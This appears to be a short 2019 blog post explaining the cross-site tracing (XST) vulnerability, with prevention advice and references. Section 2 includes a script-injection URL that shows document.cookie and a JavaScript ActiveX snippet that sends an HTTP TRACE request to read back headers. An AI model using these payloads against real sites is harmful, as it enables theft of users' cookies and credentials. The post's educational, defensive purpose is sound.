-
Cross-site tracing(XST)Web/Security 2019. 9. 7. 11:43
1. Overview
In web security, cross-site tracing (abbreviated "XST") is a network security vulnerability exploiting the HTTP TRACE method.
XST scripts exploit ActiveX, Flash, or any other controls that allow executing an HTTP TRACE request. The HTTP TRACE response includes all the HTTP headers including authentication data and HTTP cookie contents, which are then available to the script. In combination with cross domain access flaws in web browsers, the exploit is able to collect the cached credentials of any web site, including those utilizing SSL.
2. Example
the URL in the browser for a page showing the results for a search for “products” might be:
http://www.example.com/search.php?query=products
Now, take the following cases:
2.1 When HttpOnly cookies are not deployed, and TRACE is enabled
The attacker might post a modified link, such as this:
http://www.example.com/search.php?query=<script>alert(document.cookie)</script>
This harmless example will cause the victim’s browser to pop up an alert box, showing their current set of cookies.
2.2 When HttpOnly cookies are deployed but TRACE is still enabled
function sendTrace() { var xmlHttp = new ActiveXObject("Microsoft.XMLHTTP"); xmlHttp.open("TRACE", "https://www.foobar.com/extranet/",false); xmlHttp.send(); xmlDoc=xmlHttp.responseText; alert(xmlDoc); } <input type=button OnClick="sendTrace();" value="Send Trace Request">
3. Prevention
- The first and foremost security measure is to disable the TRACE request method (unless needed) on your web servers.
- Moreover, Web-server vendors should have TRACE disabled in the web-server’s default “out-of-the-box” configuration.
- Proxy servers should also be shipped with TRACE disabled in their default configurations.
- Disable TRACE in your browser’s XmlHttpRequest object too. For this, check the support page of your browser’s vendor.
- For all Internet Explorer users: if you must continue using Internet Explorer, switch to version 7 or 8, because they seem to have patches for this attack. However, the far better path, which I recommend, is for you to use the latest versions of Mozilla Firefox (>3.2) instead.
4. References
http://infosec.vishalmishra.in/2013/02/cross-site-tracing.html
https://en.wikipedia.org/wiki/Cross-site_tracing
https://opensourceforu.com/2010/12/securing-apache-part-4-xst-xshm/
'Web > Security' 카테고리의 다른 글
Secure Socket Layer (SSL) and Transport Layer Security (TLS) (0) 2019.09.28 Server-side request forgery (0) 2019.09.07 Cross-site request forgery(CSRF) (0) 2019.09.07 SQL Injection (0) 2019.09.07 Secure coding (0) 2019.09.06